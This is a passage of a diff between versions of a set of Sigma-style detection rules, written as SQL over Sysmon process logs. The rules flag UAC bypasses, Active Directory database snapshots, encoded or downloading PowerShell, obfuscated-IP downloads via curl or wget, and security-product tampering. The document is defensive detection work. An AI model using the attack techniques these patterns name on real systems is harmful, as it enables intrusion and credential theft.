"tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1036", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Administrative activity (adjust code pages according to your organization's region)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_chcp_codepage_switch.yml" }, { - "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "a58353df-af43-4753-bad0-cd83ef35eef5", - "status": "experimental", - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "status": "test", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ntdsutil_susp_usage.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "SC.EXE Query Execution", + "id": "57712d7a-679c-4a41-a913-87e7175ae429", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.002" + "attack.discovery", + "attack.t1007" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Legitimate query of a service by an administrator to get more information such as the state or PID", + "Keybase process \"kbfsdokan.exe\" query the dokan1 service with the following commandline \"sc query dokan1\"" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND OriginalFileName LIKE '%sc.exe' ESCAPE '\\' AND CommandLine LIKE '% query%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_sc_query.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Active Directory Database Snapshot Via ADExplorer", + "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Execution of Powershell with Base64", + "id": "fb843269-508c-4b76-8b8d-88679db22ce7", + "status": "experimental", + "description": "Commandline to launch powershell with a base64 payload", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_powershell_encode.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Sysinternals PsSuspend Execution", + "id": "48bbc537-b652-4b4e-bd1d-281172df448f", + "status": "experimental", + "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_execution.yml" }, { - "title": "Service Reconnaissance Via Wmic.EXE", - "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_service.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "System Network Connections Discovery Via Net.EXE", - "id": "1c67a717-32ba-409b-a45d-0fb704a73a81", - "status": "experimental", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "status": "test", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((CommandLine LIKE '% use' ESCAPE '\\' OR CommandLine LIKE '% sessions' ESCAPE '\\') OR (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% sessions %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_network_connections_discovery.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "title": "Change PowerShell Policies to an Insecure Level", + "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of executionpolicy option to set insecure policies", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Very unlikely" + "Administrator script" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" }, { - "title": "MSExchange Transport Agent Installation", - "id": "83809e84-4475-4b69-bc3e-4aad8568612f", + "title": "DLL Execution Via Register-cimprovider.exe", + "id": "a2910908-e86f-4687-aeba-76a5f996e652", "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.defense_evasion", + "attack.t1574" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" + "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Set Files as System Files Using Attrib.EXE", + "id": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"attrib\" with the \"+s\" flag to mark files as system files", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s %' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_attrib_system.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "title": "Obfuscated IP Download", + "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.discovery" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "author": "Florian Roth (Nextron Systems)", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "status": "experimental", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.t1134.004" + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Service Started/Stopped Via Wmic.EXE", - "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "title": "Use of Adplus.exe", + "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", "status": "experimental", - "description": "Detects usage of wmic to start or stop a service", + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1047" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of Adplus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_service_manipulation.yml" + "filename": "proc_creation_win_lolbin_adplus.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Suspicious VBoxDrvInst.exe Parameters", + "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs 